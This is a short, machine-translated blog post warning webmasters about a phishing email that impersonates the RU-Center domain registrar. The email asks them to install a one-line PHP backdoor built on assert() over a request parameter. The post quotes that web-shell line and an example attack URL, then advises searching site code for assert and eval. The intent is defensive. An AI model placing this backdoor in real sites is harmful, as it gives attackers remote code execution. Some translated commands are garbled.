PHPを知らない「ウェブマスター」への注目。脆弱性。

これは自動翻訳です。
元の言語で出版物を読むには、ここをクリックしてください。

今日、私の友人の何人かは、RU-Center（ロシア最大のドメイン名レジストラ） -nic.ruから、次の内容の手紙を受け取ったとされています。

手紙はinfo@nic.technicalから送られました。手紙の中で、RU-Centerを代表する攻撃者は、次のコードをWebサイトに配置することを提案しています。

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

残念ながら、自分たちを「ウェブマスター」（多数のサイト所有者）と呼んでいる同僚の多くは、PHPを知らず、上記のコードの危険性について考えていません。この関数にパラメータとして文字列を渡すと、assert（）によってPHPコードと見なされます。注意してください！

assertまたはevalコマンドを使用して、phpプロジェクトの脆弱性を検査することをお勧めします。これらのコマンドがプロジェクトコードに存在する場合でも、慌てる必要はありません。アルゴリズムを調べてください。アルゴリズムの許可された使用はかなり可能です。上記の例の場合、このコマンドを使用すると、攻撃者は、たとえばRUCENTERパラメーター（ http://sistema-audit.ru/?RUCENTER=PHP-code）を使用してサイトを呼び出すことができます。

疑わしいファイルのリストを取得するために、たとえばlinuxコマンドgrep -i -r'assert '/ home / www / mysite / *を使用して検索を実行することをお勧めします。インスタンスは使用されるコードです。

あなた自身とあなたのサイトの世話をしてください！

これは自動翻訳です。
元の言語で出版物を読むには、ここをクリックしてください。